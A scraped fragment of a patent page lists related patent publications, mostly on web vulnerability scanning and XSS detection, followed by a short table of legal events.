| Publication | Publication Date | Title |
|---|---|---|
| CN110324311B (en) | Vulnerability detection method and device, computer equipment and storage medium | |
| US10769228B2 (en) | Systems and methods for web analytics testing and web development | |
| CN101964025B (en) | XSS detection method and equipment | |
| CN111400722B (en) | Method, apparatus, computer device and storage medium for scanning small program | |
| US10325097B2 (en) | Static detection of context-sensitive cross-site scripting vulnerabilities | |
| CN104956372A (en) | Determining coverage of dynamic security scans using runtime and static code analyses | |
| CN111552854A (en) | Webpage data capturing method and device, storage medium and equipment | |
| CN113312633A (en) | Website vulnerability scanning method, device, equipment and storage medium | |
| CN112926061B (en) | Plug-in processing method and device | |
| US20210064453A1 (en) | Automated application programming interface (api) specification construction | |
| US20210092144A1 (en) | Http log integration to web application testing | |
| CN111625837B (en) | Method, device and server for identifying system loopholes | |
| CN110457900B (en) | Website monitoring method, device and equipment and readable storage medium | |
| CN116361793A (en) | Code detection method, device, electronic equipment and storage medium | |
| Noskov | Smart City Webgis Applications: Proof of Work Concept For High-Level Quality-Of-Service Assurance | |
| CN112671615B (en) | Method, system and storage medium for collecting front-end user operation behavior data | |
| CN112446030B (en) | Method and device for detecting file uploading vulnerability of webpage end | |
| CN114296793A (en) | Anti-obfuscation method and device for obfuscated codes, readable medium and electronic device | |
| CN110061864B (en) | Method and system for automatically verifying domain name configuration | |
| US10592388B1 (en) | Methods for facilitating more efficient network message exchange and analysis and devices thereof | |
| CN112069476B (en) | Login state detection method, device, equipment and readable storage medium | |
| KR102247065B1 (en) | Method, apparatus and computer program for collecting URL in web page | |
| CN116155564A (en) | Method and device for detecting collision library attack, electronic equipment and storage medium | |
| CN116015921A (en) | Webpage forwarding method and device, electronic equipment and storage medium | |
| CN118041679A (en) | Vulnerability detection method, vulnerability detection device, terminal equipment and storage medium |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| PB01 | Publication | ||
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| SE01 | Entry into force of request for substantive examination |